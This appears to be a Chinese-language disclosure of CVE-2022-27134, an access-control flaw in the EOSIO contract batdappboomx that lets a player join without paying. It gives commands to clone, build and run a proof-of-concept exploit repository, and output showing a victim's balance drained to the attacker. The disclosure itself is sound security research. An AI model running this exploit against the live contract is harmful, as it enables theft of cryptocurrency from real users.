CVE-2022-27134
batdappboomx 是一个运行在 EOSIO 区块链 上的公开智能合约。该智能合约向参与者奖励加密货币,但前提是他们需要事先支付一些加密货币。
该智能合约的最新版本。智能合约的 SHA256 哈希值为 1327c04cf4b56183eddb1a897bbebf5a873d3421272b708829a4ed0765bef820 可在区块浏览器 https://bloks.io/account/batdappboomx 查看。
访问控制漏洞
batdappboomx 并非开源,但我们通过 WASAI 发现了一个漏洞。攻击者可以在不支付任何费用的情况下加入这个游戏。
git clone https://github.com/Kenun99/CVE-batdappboomx.git && cd CVE-batdappboomx
docker build -t localhost/client-eos:eos .
docker run --rm --network host -it localhost/client-eos:eos
EOSinfo 2022-03-11T14:28:53.345 keosd wallet_plugin.cpp:38 plugin_initialize ]
...
warn 2022-03-11T14:28:53.355 keosd wallet.cpp:218 save_wallet_file ] saving wallet to file /root/eosio-wallet/./default.wallet
Creating wallet: default
Save password to use in the future to unlock this wallet.
Without password imported keys will not be retrievable.
saving password to /root/passwd
imported private key for: EOS6MRyAjQq8ud7hVNYcfnVPJqcVpscN5So8BhtHuGYqET5GDW5CV
[+] victim's balance: 100.00 -> 0.00
[+] attacker's balance: 10000000.00 10000100.00
[+] 攻击成功。获得了更多加密货币。